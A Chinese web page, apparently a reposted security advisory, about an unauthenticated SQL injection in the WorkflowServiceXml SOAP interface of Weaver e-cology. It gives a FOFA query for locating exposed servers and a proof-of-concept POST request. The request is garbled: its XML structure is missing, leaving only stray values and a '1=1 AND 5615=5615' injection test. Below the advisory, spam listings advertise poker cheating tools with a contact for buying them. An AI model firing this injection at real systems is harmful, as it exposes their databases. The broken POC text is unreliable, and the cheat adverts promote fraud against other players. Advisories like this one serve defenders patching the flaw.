泛微e-cology WorkflowServiceXml SQL注入漏洞(POC)
创始人
2025-01-08 04:32:28
0

漏洞描述:
泛微 e-cology 是泛微公司开发的协同管理应用平台。泛微 e-cology v10.64.1的/services/接口默认对内网暴露,用于服务调用,未经身份认证的攻击者可向 /services/WorkflowServiceXml 接口发送恶意的SOAP请求进行SQL注入,攻击者通过漏洞可以获取服务器数据库敏感信息。

漏洞发现时间:

2024-7-12


影响版本:
e-cology9 < 10.64.1

FOFA语法:

app="泛微-OA(e-cology)"

POC:

POST /services/WorkflowServiceXml HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Content-Type: text/xml Accept-Encoding: gzip Content-Length: 487                      1         1         1         1                      1=1 AND 5615=5615                    

漏洞复现:


修复:

目前官方已有可更新版本,建议受影响用户升级至最新版本:

https://www.weaver.com.cn/cs/securityDownload.html

参考文献:

OSCS | 开源软件供应链安全社区 | 让每一个开源项目变得更安全

POC/泛微OA-E-Cology接口WorkflowServiceXml存在SQL注入漏洞.md at main · wy876/POC · GitHub

相关内容

热门资讯

透视规律!wepoker破解版... 透视规律!wepoker破解版内购(透视)真是是真的挂,普及教程(有挂检测)-哔哩哔哩1、进入到we...
透视实锤!wepoker私人局... 透视实锤!wepoker私人局有透视吗,poker world辅助器,讲义教程(果真有挂)-哔哩哔哩...
第2分钟解密!werplan透... 第2分钟解密!werplan透视挂(透视)真是真的是有挂,必赢教程(有挂辅助)-哔哩哔哩1.werp...
透视教程!hhpkoer辅助器... 透视教程!hhpkoer辅助器(透视)果然存在有挂,必胜教程(有挂黑科技)-哔哩哔哩1、下载好hhp...
透视规律!德州局透视脚本免费版... 透视规律!德州局透视脚本免费版下载手机版,aapoker发牌逻辑,方案教程(有挂猫腻)-哔哩哔哩1、...
4分钟外挂!德普软件(透视)一... 4分钟外挂!德普软件(透视)一贯是真的挂,分享教程(有挂实锤)-哔哩哔哩1、德普软件透视辅助简单,德...
透视实锤!wepoker辅助插... 您好,wepoker辅助插件功能这款游戏可以开挂的,确实是有挂的,需要了解加去威信【48527505...
透视黑科技!如何下载wepok... 透视黑科技!如何下载wepoker安装包,wepoker有没有插件,机巧教程(揭秘有挂)-哔哩哔哩一...
一分钟外挂!we-poker是... 一分钟外挂!we-poker是什么软件(透视)真是有挂,技巧教程(了解有挂)-哔哩哔哩1、很好的工具...
透视攻略!模拟器打开hhpok... 透视攻略!模拟器打开hhpoker(透视)确实真的有挂,安装教程(有挂漏洞)-哔哩哔哩1、操作简单,...